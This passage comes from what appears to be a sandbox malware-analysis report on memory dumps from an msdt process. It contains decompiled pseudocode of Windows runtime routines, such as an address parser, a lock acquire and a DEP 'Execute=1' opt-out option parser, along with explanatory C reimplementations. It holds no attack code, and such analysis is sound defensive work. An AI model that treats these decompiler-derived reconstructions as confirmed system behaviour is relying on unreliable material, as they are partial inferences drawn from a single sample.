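        return 0;

    size_t units = value_bytes / 2;            /* (_t47 >> 1) in the dump */
    for (size_t i = 0; i < units; i++) buf[i] = value[i];
    buf[units] = 0;                            /* wide NUL at the reported length */

    if (u16_find(buf, units, "Execute=1") >= 0)
        return 1;                              /* DEP opt-out path */

    /* No Execute=1: walk space (0x20) separated tokens like the loop labelled L10
     * in the decompilation, NUL-terminating each in place before the handler sees it. */
    size_t start = 0;
    while (start < units) {
        size_t i = start;
        while (i < units && buf[i] != 0x20) i++;
        int had_sep = (i < units);
        buf[i] = 0;
        if (on_section) on_section(buf + start, i - start, ctx);
        if (!had_sep) break;                   /* no more separators: return 0 */
        start = i + 1;                         /* _t62 + 2 bytes = next unit */
    }
    return 0;
}

/* Helpers for driving the parser with constructed ASCII input. */
static size_t u16_from_ascii(const char *src, u16 *dst, size_t cap_units)
{
    size_t n = 0;
    while (src[n] && n + 1 < cap_units) { dst[n] = (u16)(unsigned char)src[n]; n++; }
    dst[n] = 0;
    return n * 2;                              /* byte length, like _v544 */
}

static void count_cb(const u16 *token, size_t len, void *ctx) { (void)token; (void)len; (*(int *)ctx)++; }

static int run_ascii(const char *ascii, int *tokens)
{
    u16 v[EXEC_OPTS_MAX_UNITS + 8];
    size_t bytes = u16_from_ascii(ascii, v, sizeof v / sizeof v[0]);
    *tokens = 0;
    return process_execute_options(v, bytes, count_cb, tokens);
}

int execute_options_result(const char *ascii) { int t; return run_ascii(ascii, &t); }
int execute_options_tokens(const char *ascii) { int t; run_ascii(ascii, &t); return t; }

/* Edge case: a value of 0x214 bytes or more reaches neither path. */
int oversized_value_is_ignored(void)
{
    u16 big[300];                              /* 600 bytes of 'A' */
    for (size_t i = 0; i < 300; i++) big[i] = 0x41;
    int count = 0;
    return process_execute_options(big, sizeof big, count_cb, &count) == 0 && count == 0;
}

int main(void)
{
    /* Constructed sample values, not taken from the analysed document. */
    const char *samples[] = { "Execute=1", "SectionA SectionB", "Execute=10", "" };
    for (size_t i = 0; i < 4; i++)
        printf("\"%s\" -> result=%d tokens=%d\n", samples[i],
               execute_options_result(samples[i]), execute_options_tokens(samples[i]));
    return oversized_value_is_ignored() ? 0 : 1;
}
```

Because the match is modelled as a substring search, "Execute=10" also takes the opt-out path in this reimplementation; whether the real helper behind E02600D27 compares whole tokens cannot be settled from the decompilation alone, so treat that as a property of the example, not a finding about ntdll.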

                                                                            C-Code - Quality: 100%
                                                                            			E02630B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				void* _t108;
                                                                            				void* _t116;
                                                                            				char _t120;
                                                                            				short _t121;
                                                                            				void* _t128;
                                                                            				intOrPtr* _t130;
                                                                            				char _t132;
                                                                            				short _t133;
                                                                            				intOrPtr _t141;
                                                                            				signed int _t156;
                                                                            				signed int _t174;
                                                                            				intOrPtr _t177;
                                                                            				intOrPtr* _t179;
                                                                            				intOrPtr _t180;
                                                                            				void* _t183;
                                                                            
                                                                            				_t179 = _a4;
                                                                            				_t141 =  *_t179;
                                                                            				_v16 = 0;
                                                                            				_v28 = 0;
                                                                            				_v8 = 0;
                                                                            				_v24 = 0;
                                                                            				_v12 = 0;
                                                                            				_v32 = 0;
                                                                            				_v20 = 0;
                                                                            				if(_t141 == 0) {
                                                                            					L41:
                                                                            					 *_a8 = _t179;
                                                                            					_t180 = _v24;
                                                                            					if(_t180 != 0) {
                                                                            						if(_t180 != 3) {
                                                                            							goto L6;
                                                                            						}
                                                                            						_v8 = _v8 + 1;
                                                                            					}
                                                                            					_t174 = _v32;
                                                                            					if(_t174 == 0) {
                                                                            						if(_v8 == 7) {
                                                                            							goto L43;
                                                                            						}
                                                                            						goto L6;
                                                                            					}
                                                                            					L43:
                                                                            					if(_v16 != 1) {
                                                                            						if(_v16 != 2) {
                                                                            							goto L6;
                                                                            						}
                                                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                            						L47:
                                                                            						if(_t174 != 0) {
                                                                            							E02608980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                            							_t116 = 8;
                                                                            							E025FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                            						}
                                                                            						return 0;
                                                                            					}
                                                                            					if(_t180 != 0) {
                                                                            						if(_v12 > 3) {
                                                                            							goto L6;
                                                                            						}
                                                                            						_t120 = E02630CFA(_v28, 0, 0xa);
                                                                            						_t183 = _t183 + 0xc;
                                                                            						if(_t120 > 0xff) {
                                                                            							goto L6;
                                                                            						}
                                                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                            						goto L47;
                                                                            					}
                                                                            					if(_v12 > 4) {
                                                                            						goto L6;
                                                                            					}
                                                                            					_t121 = E02630CFA(_v28, _t180, 0x10);
                                                                            					_t183 = _t183 + 0xc;
                                                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                            					goto L47;
                                                                            				} else {
                                                                            					while(1) {
                                                                            						_t123 = _v16;
                                                                            						if(_t123 == 0) {
                                                                            							goto L7;
                                                                            						}
                                                                            						_t108 = _t123 - 1;
                                                                            						if(_t108 != 0) {
                                                                            							goto L1;
                                                                            						}
                                                                            						_t178 = _t141;
                                                                            						if(E026306BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                            							if(E026306BA(_t135, _t178) == 0 || E02630A5B(_t136, _t178) == 0) {
                                                                            								if(_t141 != 0x3a) {
                                                                            									if(_t141 == 0x2e) {
                                                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                            											goto L41;
                                                                            										} else {
                                                                            											_v24 = _v24 + 1;
                                                                            											L27:
                                                                            											_v16 = _v16 & 0x00000000;
                                                                            											L28:
                                                                            											if(_v28 == 0) {
                                                                            												goto L20;
                                                                            											}
                                                                            											_t177 = _v24;
                                                                            											if(_t177 != 0) {
                                                                            												if(_v12 > 3) {
                                                                            													L6:
                                                                            													return 0xc000000d;
                                                                            												}
                                                                            												_t132 = E02630CFA(_v28, 0, 0xa);
                                                                            												_t183 = _t183 + 0xc;
                                                                            												if(_t132 > 0xff) {
                                                                            													goto L6;
                                                                            												}
                                                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                            												goto L20;
                                                                            											}
                                                                            											if(_v12 > 4) {
                                                                            												goto L6;
                                                                            											}
                                                                            											_t133 = E02630CFA(_v28, 0, 0x10);
                                                                            											_t183 = _t183 + 0xc;
                                                                            											_v20 = _v20 + 1;
                                                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                            											goto L20;
                                                                            										}
                                                                            									}
                                                                            									goto L41;
                                                                            								}
                                                                            								if(_v24 > 0 || _v8 > 6) {
                                                                            									goto L41;
                                                                            								} else {
                                                                            									_t130 = _t179 + 1;
                                                                            									if( *_t130 == _t141) {
                                                                            										if(_v32 != 0) {
                                                                            											goto L41;
                                                                            										}
                                                                            										_v32 = _v8 + 1;
                                                                            										_t156 = 2;
                                                                            										_v8 = _v8 + _t156;
                                                                            										L34:
                                                                            										_t179 = _t130;
                                                                            										_v16 = _t156;
                                                                            										goto L28;
                                                                            									}
                                                                            									_v8 = _v8 + 1;
                                                                            									goto L27;
                                                                            								}
                                                                            							} else {
                                                                            								_v12 = _v12 + 1;
                                                                            								if(_v24 > 0) {
                                                                            									goto L41;
                                                                            								}
                                                                            								_a7 = 1;
                                                                            								goto L20;
                                                                            							}
                                                                            						} else {
                                                                            							_v12 = _v12 + 1;
                                                                            							L20:
                                                                            							_t179 = _t179 + 1;
                                                                            							_t141 =  *_t179;
                                                                            							if(_t141 == 0) {
                                                                            								goto L41;
                                                                            							}
                                                                            							continue;
                                                                            						}
                                                                            						L7:
                                                                            						if(_t141 == 0x3a) {
                                                                            							if(_v24 > 0 || _v8 > 0) {
                                                                            								goto L41;
                                                                            							} else {
                                                                            								_t130 = _t179 + 1;
                                                                            								if( *_t130 != _t141) {
                                                                            									goto L41;
                                                                            								}
                                                                            								_v20 = _v20 + 1;
                                                                            								_t156 = 2;
                                                                            								_v32 = 1;
                                                                            								_v8 = _t156;
                                                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                            								goto L34;
                                                                            							}
                                                                            						}
                                                                            						L8:
                                                                            						if(_v8 > 7) {
                                                                            							goto L41;
                                                                            						}
                                                                            						_t142 = _t141;
                                                                            						if(E026306BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                            							if(E026306BA(_t124, _t142) == 0 || E02630A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                            								goto L41;
                                                                            							} else {
                                                                            								_t128 = 1;
                                                                            								_a7 = 1;
                                                                            								_v28 = _t179;
                                                                            								_v16 = 1;
                                                                            								_v12 = 1;
                                                                            								L39:
                                                                            								if(_v16 == _t128) {
                                                                            									goto L20;
                                                                            								}
                                                                            								goto L28;
                                                                            							}
                                                                            						} else {
                                                                            							_a7 = 0;
                                                                            							_v28 = _t179;
                                                                            							_v16 = 1;
                                                                            							_v12 = 1;
                                                                            							goto L20;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				_t123 = _t108 == 1;
                                                                            				if(_t108 == 1) {
                                                                            					goto L8;
                                                                            				}
                                                                            				_t128 = 1;
                                                                            				goto L39;
                                                                            			}
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02630c60
                                                                            0x02630afb
                                                                            0x02630afe
                                                                            0x02630b02
                                                                            0x02630b05
                                                                            0x02630b08
                                                                            0x00000000
                                                                            0x02630b08
                                                                            0x02630ae6
                                                                            0x02630b44
                                                                            0x026309f8
                                                                            0x026309f8
                                                                            0x026309f9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eaa0
                                                                            0x00000000

Memory Dump Source
• Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
• Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
• Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
Similarity
• API ID: __fassign
• String ID: .$:$:
• API String ID: 3965848254-2308638275
• Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
• Instruction ID: faa1f971997929ba8d411f5a00e2fc157bc288a1b396f4b0fa719c98bdadf81f
• Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
• Instruction Fuzzy Hash: 18A19D71D0021AEFDF2ACF68C8447BEB7B9AF45309F24846AD842A7382D731964DCB55
Uniqueness
• Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 50%
                                                                            			E02630554(signed int _a4, char _a8) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int* _t49;
                                                                            				signed int _t51;
                                                                            				signed int _t56;
                                                                            				signed int _t58;
                                                                            				signed int _t61;
                                                                            				signed int _t63;
                                                                            				void* _t66;
                                                                            				intOrPtr _t67;
                                                                            				void* _t69;
                                                                            				signed int _t70;
                                                                            				void* _t75;
                                                                            				signed int _t81;
                                                                            				signed int _t84;
                                                                            				void* _t86;
                                                                            				signed int _t93;
                                                                            				signed int _t96;
                                                                            				intOrPtr _t105;
                                                                            				signed int _t107;
                                                                            				void* _t110;
                                                                            				signed int _t115;
                                                                            				signed int* _t119;
                                                                            				void* _t125;
                                                                            				void* _t126;
                                                                            				signed int _t128;
                                                                            				signed int _t130;
                                                                            				signed int _t138;
                                                                            				signed int _t144;
                                                                            				void* _t158;
                                                                            				void* _t159;
                                                                            				void* _t160;
                                                                            
                                                                            				_t96 = _a4;
                                                                            				_t115 =  *(_t96 + 0x28);
                                                                            				_push(_t138);
                                                                            				if(_t115 < 0) {
                                                                            					_t105 =  *[fs:0x18];
                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                            						goto L6;
                                                                            					} else {
                                                                            						__eflags = _t115 | 0xffffffff;
                                                                            						asm("lock xadd [eax], edx");
                                                                            						return 1;
                                                                            					}
                                                                            				} else {
                                                                            					L6:
                                                                            					_push(_t128);
                                                                            					while(1) {
                                                                            						L7:
                                                                            						__eflags = _t115;
                                                                            						if(_t115 >= 0) {
                                                                            							break;
                                                                            						}
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						} else {
                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                            							_t49 = _t96 + 0x1c;
                                                                            							_t106 = 1;
                                                                            							asm("lock xadd [edx], ecx");
                                                                            							_t115 =  *(_t96 + 0x28);
                                                                            							__eflags = _t115;
                                                                            							if(_t115 < 0) {
                                                                            								L23:
                                                                            								_t130 = 0;
                                                                            								__eflags = 0;
                                                                            								while(1) {
                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                            									asm("sbb esi, esi");
                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026d01c0;
                                                                            									_push(_t144);
                                                                            									_push(0);
                                                                            									_t51 = E025EF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                            									__eflags = _t51 - 0x102;
                                                                            									if(_t51 != 0x102) {
                                                                            										break;
                                                                            									}
                                                                            									_t106 =  *(_t144 + 4);
                                                                            									_t126 =  *_t144;
                                                                            									_t86 = E02634FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                            									_push(_t126);
                                                                            									_push(_t86);
                                                                            									E02643F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                            									E02643F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                            									_t130 = _t130 + 1;
                                                                            									_t160 = _t158 + 0x28;
                                                                            									__eflags = _t130 - 2;
                                                                            									if(__eflags > 0) {
                                                                            										E0267217A(_t106, __eflags, _t96);
                                                                            									}
                                                                            									_push("RTL: Re-Waiting\n");
                                                                            									_push(0);
                                                                            									_push(0x65);
                                                                            									E02643F92();
                                                                            									_t158 = _t160 + 0xc;
                                                                            								}
                                                                            								__eflags = _t51;
                                                                            								if(__eflags < 0) {
                                                                            									_push(_t51);
                                                                            									E02633915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                            									asm("int3");
                                                                            									while(1) {
                                                                            										L32:
                                                                            										__eflags = _a8;
                                                                            										if(_a8 == 0) {
                                                                            											break;
                                                                            										}
                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                            										_t119 = _t96 + 0x24;
                                                                            										_t107 = 1;
                                                                            										asm("lock xadd [eax], ecx");
                                                                            										_t56 =  *(_t96 + 0x28);
                                                                            										_a4 = _t56;
                                                                            										__eflags = _t56;
                                                                            										if(_t56 != 0) {
                                                                            											L40:
                                                                            											_t128 = 0;
                                                                            											__eflags = 0;
                                                                            											while(1) {
                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                            												asm("sbb esi, esi");
                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026d01c0;
                                                                            												_push(_t138);
                                                                            												_push(0);
                                                                            												_t58 = E025EF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                            												__eflags = _t58 - 0x102;
                                                                            												if(_t58 != 0x102) {
                                                                            													break;
                                                                            												}
                                                                            												_t107 =  *(_t138 + 4);
                                                                            												_t125 =  *_t138;
                                                                            												_t75 = E02634FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                            												_push(_t125);
                                                                            												_push(_t75);
                                                                            												E02643F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                            												E02643F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                            												_t128 = _t128 + 1;
                                                                            												_t159 = _t158 + 0x28;
                                                                            												__eflags = _t128 - 2;
                                                                            												if(__eflags > 0) {
                                                                            													E0267217A(_t107, __eflags, _t96);
                                                                            												}
                                                                            												_push("RTL: Re-Waiting\n");
                                                                            												_push(0);
                                                                            												_push(0x65);
                                                                            												E02643F92();
                                                                            												_t158 = _t159 + 0xc;
                                                                            											}
                                                                            											__eflags = _t58;
                                                                            											if(__eflags < 0) {
                                                                            												_push(_t58);
                                                                            												E02633915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                            												asm("int3");
                                                                            												_t61 =  *_t107;
                                                                            												 *_t107 = 0;
                                                                            												__eflags = _t61;
                                                                            												if(_t61 == 0) {
                                                                            													L1:
                                                                            													_t63 = E02615384(_t138 + 0x24);
                                                                            													if(_t63 != 0) {
                                                                            														goto L52;
                                                                            													} else {
                                                                            														goto L2;
                                                                            													}
                                                                            												} else {
                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                            													_push( &_a4);
                                                                            													_push(_t61);
                                                                            													_t70 = E025EF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                            													__eflags = _t70;
                                                                            													if(__eflags >= 0) {
                                                                            														goto L1;
                                                                            													} else {
                                                                            														_push(_t70);
                                                                            														E02633915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                            														L52:
                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                            														_push( &_a4);
                                                                            														_push(1);
                                                                            														_t63 = E025EF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                            														__eflags = _t63;
                                                                            														if(__eflags >= 0) {
                                                                            															L2:
                                                                            															return _t63;
                                                                            														} else {
                                                                            															_push(_t63);
                                                                            															E02633915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                            															_push( &_a4);
                                                                            															_push(1);
                                                                            															_t63 = E025EF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                            															__eflags = _t63;
                                                                            															if(__eflags >= 0) {
                                                                            																goto L2;
                                                                            															} else {
                                                                            																_push(_t63);
                                                                            																_t66 = E02633915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                            																asm("int3");
                                                                            																while(1) {
                                                                            																	_t110 = _t66;
                                                                            																	__eflags = _t66 - 1;
                                                                            																	if(_t66 != 1) {
                                                                            																		break;
                                                                            																	}
                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                            																	_t66 = _t110;
                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                            																	__eflags = _t66 - _t110;
                                                                            																	if(_t66 != _t110) {
                                                                            																		continue;
                                                                            																	} else {
                                                                            																		_t67 =  *[fs:0x18];
                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                            																		return _t67;
                                                                            																	}
                                                                            																	goto L59;
                                                                            																}
                                                                            																E02615329(_t110, _t138);
                                                                            																_t69 = E026153A5(_t138, 1);
                                                                            																return _t69;
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											} else {
                                                                            												_t56 =  *(_t96 + 0x28);
                                                                            												goto L3;
                                                                            											}
                                                                            										} else {
                                                                            											_t107 =  *_t119;
                                                                            											__eflags = _t107;
                                                                            											if(__eflags > 0) {
                                                                            												while(1) {
                                                                            													_t81 = _t107;
                                                                            													asm("lock cmpxchg [edi], esi");
                                                                            													__eflags = _t81 - _t107;
                                                                            													if(_t81 == _t107) {
                                                                            														break;
                                                                            													}
                                                                            													_t107 = _t81;
                                                                            													__eflags = _t81;
                                                                            													if(_t81 > 0) {
                                                                            														continue;
                                                                            													}
                                                                            													break;
                                                                            												}
                                                                            												_t56 = _a4;
                                                                            												__eflags = _t107;
                                                                            											}
                                                                            											if(__eflags != 0) {
                                                                            												while(1) {
                                                                            													L3:
                                                                            													__eflags = _t56;
                                                                            													if(_t56 != 0) {
                                                                            														goto L32;
                                                                            													}
                                                                            													_t107 = _t107 | 0xffffffff;
                                                                            													_t56 = 0;
                                                                            													asm("lock cmpxchg [edx], ecx"); // CAS on the lock word: cmpxchg compares eax with [edx]; the expected value was just set to 0 (free)
                                                                            													__eflags = 0;
                                                                            													if(0 != 0) { // constant-false test is a decompiler artifact: the real branch is the ZF result of the cmpxchg (CAS failed -> retry)
                                                                            														continue;
                                                                            													} else {
                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24)); // record owner: fs:[0x18] is the TEB, TEB+0x24 is ClientId.UniqueThread (current thread id)
                                                                            														return 1;
                                                                            													}
                                                                            													goto L59;
                                                                            												}
                                                                            												continue;
                                                                            											} else {
                                                                            												goto L40;
                                                                            											}
                                                                            										}
                                                                            										goto L59;
                                                                            									}
                                                                            									__eflags = 0;
                                                                            									return 0;
                                                                            								} else {
                                                                            									_t115 =  *(_t96 + 0x28);
                                                                            									continue;
                                                                            								}
                                                                            							} else {
                                                                            								_t106 =  *_t49;
                                                                            								__eflags = _t106;
                                                                            								if(__eflags > 0) {
                                                                            									while(1) {
                                                                            										_t93 = _t106;
                                                                            										asm("lock cmpxchg [edi], esi");
                                                                            										__eflags = _t93 - _t106;
                                                                            										if(_t93 == _t106) {
                                                                            											break;
                                                                            										}
                                                                            										_t106 = _t93;
                                                                            										__eflags = _t93;
                                                                            										if(_t93 > 0) {
                                                                            											continue;
                                                                            										}
                                                                            										break;
                                                                            									}
                                                                            									__eflags = _t106;
                                                                            								}
                                                                            								if(__eflags != 0) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L23;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L59;
                                                                            					}
                                                                            					_t84 = _t115;
                                                                            					asm("lock cmpxchg [esi], ecx");
                                                                            					__eflags = _t84 - _t115;
                                                                            					if(_t84 != _t115) {
                                                                            						_t115 = _t84;
                                                                            						goto L7;
                                                                            					} else {
                                                                            						return 1;
                                                                            					}
                                                                            				}
                                                                            				L59:
                                                                            			}
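The decompiled routine above is a compare-and-swap lock acquire: a `lock cmpxchg` loop that re-reads the lock word and retries while it stays positive, and a second `lock cmpxchg` against an expected value of 0 that, on success, stores the current thread id (read from the TEB at fs:[0x18], offset 0x24 = ClientId.UniqueThread) into the object at +0x2c and returns 1. The C program below is an added example written for this report, not code from the sample or from Joe Sandbox; it renders that idiom readably with C11 atomics so it builds and runs anywhere. The state-word convention (0 = free, positive = number of shared holders, -1 = held exclusively), the caller-supplied thread id in place of the TEB read, and the field names are assumptions chosen to make the example self-contained; the sample's actual register contents (esi/ecx) and field meanings are not visible in the excerpt.

```c
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed lock object mirroring the two fields the decompilation touches:
 * a lock word that is updated with lock cmpxchg, and an owner thread id that
 * is written only after a successful exclusive CAS. Offsets +0x28/+0x2c from
 * the decompilation are not reproduced. Convention (assumed): 0 = free,
 * >0 = shared holder count, -1 = held exclusively. */
typedef struct {
    _Atomic int32_t state;
    uint32_t owner_tid;
} spinlock_t;

/* Exclusive path: one CAS from 0 to -1. On success record the owner, as the
 * decompiled code does by copying ClientId.UniqueThread out of the TEB
 * (fs:[0x18]+0x24). The caller passes its own thread id here instead. */
static int try_acquire_exclusive(spinlock_t *l, uint32_t tid) {
    int32_t expected = 0;
    if (atomic_compare_exchange_strong(&l->state, &expected, -1)) {
        l->owner_tid = tid;
        return 1;
    }
    return 0; /* held (shared or exclusive) by someone else */
}

/* Shared path: the "cmpxchg; if equal break; if value>0 continue; break" loop.
 * Re-read the word that cmpxchg wrote back and retry while the lock is not
 * held exclusively; the sample handles the value-0 case in a separate branch,
 * here it is folded into the same loop. */
static int try_acquire_shared(spinlock_t *l) {
    int32_t seen = atomic_load(&l->state);
    while (seen >= 0) {
        int32_t expected = seen;
        if (atomic_compare_exchange_strong(&l->state, &expected, seen + 1))
            return 1;
        seen = expected; /* CAS failed: expected now holds the current word */
    }
    return 0; /* negative: exclusive holder present */
}

static void release_exclusive(spinlock_t *l) {
    l->owner_tid = 0;
    atomic_store(&l->state, 0);
}

static void release_shared(spinlock_t *l) {
    atomic_fetch_sub(&l->state, 1);
}

/* Deterministic single-threaded walkthrough of the state machine. Returns a
 * bitmask of the checks that held; 0x7f means every transition behaved as
 * the assumed convention requires. */
static int run_scenario(void) {
    spinlock_t l = { 0, 0 };
    int ok = 0;
    if (try_acquire_shared(&l) == 1)            ok |= 0x01; /* free -> 1 reader */
    if (try_acquire_exclusive(&l, 0x1234) == 0) ok |= 0x02; /* writer blocked by reader */
    release_shared(&l);                                     /* back to 0 */
    if (try_acquire_exclusive(&l, 0x1234) == 1) ok |= 0x04; /* CAS 0 -> -1 */
    if (l.owner_tid == 0x1234)                  ok |= 0x08; /* owner recorded after CAS */
    if (try_acquire_exclusive(&l, 0x5678) == 0) ok |= 0x10; /* second writer blocked */
    if (try_acquire_shared(&l) == 0)            ok |= 0x20; /* reader blocked by writer */
    release_exclusive(&l);
    if (atomic_load(&l.state) == 0 && l.owner_tid == 0) ok |= 0x40;
    return ok;
}

int main(void) {
    int r = run_scenario();
    printf("lock scenario result: 0x%02x (all checks pass = 0x7f)\n", r);
    return r == 0x7f ? 0 : 1;
}
```

When reading other decompiled lock routines in this report, the same three markers identify the idiom: a `lock cmpxchg` inside a retry loop, a constant-folded `if(0 != 0)` where the decompiler lost the ZF result, and a read of fs:[0x18]+0x24 immediately after the successful CAS.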
Instruction address column for the decompiled function above (one address per pseudocode line; 0x00000000 marks lines with no address). The per-line pairing with the code is not recoverable in this extraction; the code ranges covered are 0x0263055a-0x026305f3, 0x02652178-0x026523d7, 0x02615367-0x0261537c, 0x026153be-0x026153ea and 0x02649153-0x02649176.
                                                                            0x0263058f
                                                                            0x02630583
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02652206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-4236105082
                                                                            • Opcode ID: cfb0e3d4aff16a02cd4937944ee208cb2d97654f2ba1932b3797c4009fecdf7f
                                                                            • Instruction ID: b72fdd25ae4a52220fc508d5733d2564b4315666325bc3d1687c014b50aeb339
                                                                            • Opcode Fuzzy Hash: cfb0e3d4aff16a02cd4937944ee208cb2d97654f2ba1932b3797c4009fecdf7f
                                                                            • Instruction Fuzzy Hash: 915128757002116BEB25CE18CCD1F6773AAAF84724F25826DEE55DB384DB31EC428B98
                                                                            Uniqueness
                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                            			E026314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                            				signed int _v8;
                                                                            				char _v10;
                                                                            				char _v140;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t24;
                                                                            				void* _t26;
                                                                            				signed int _t29;
                                                                            				signed int _t34;
                                                                            				signed int _t40;
                                                                            				intOrPtr _t45;
                                                                            				void* _t51;
                                                                            				intOrPtr* _t52;
                                                                            				void* _t54;
                                                                            				signed int _t57;
                                                                            				void* _t58;
                                                                            
                                                                            				_t51 = __edx;
                                                                            				_t24 =  *0x26d2088; // 0x7632310a
                                                                            				_v8 = _t24 ^ _t57;
                                                                            				_t45 = _a16;
                                                                            				_t53 = _a4;
                                                                            				_t52 = _a20;
                                                                            				if(_a4 == 0 || _t52 == 0) {
                                                                            					L10:
                                                                            					_t26 = 0xc000000d;
                                                                            				} else {
                                                                            					if(_t45 == 0) {
                                                                            						if( *_t52 == _t45) {
                                                                            							goto L3;
                                                                            						} else {
                                                                            							goto L10;
                                                                            						}
                                                                            					} else {
                                                                            						L3:
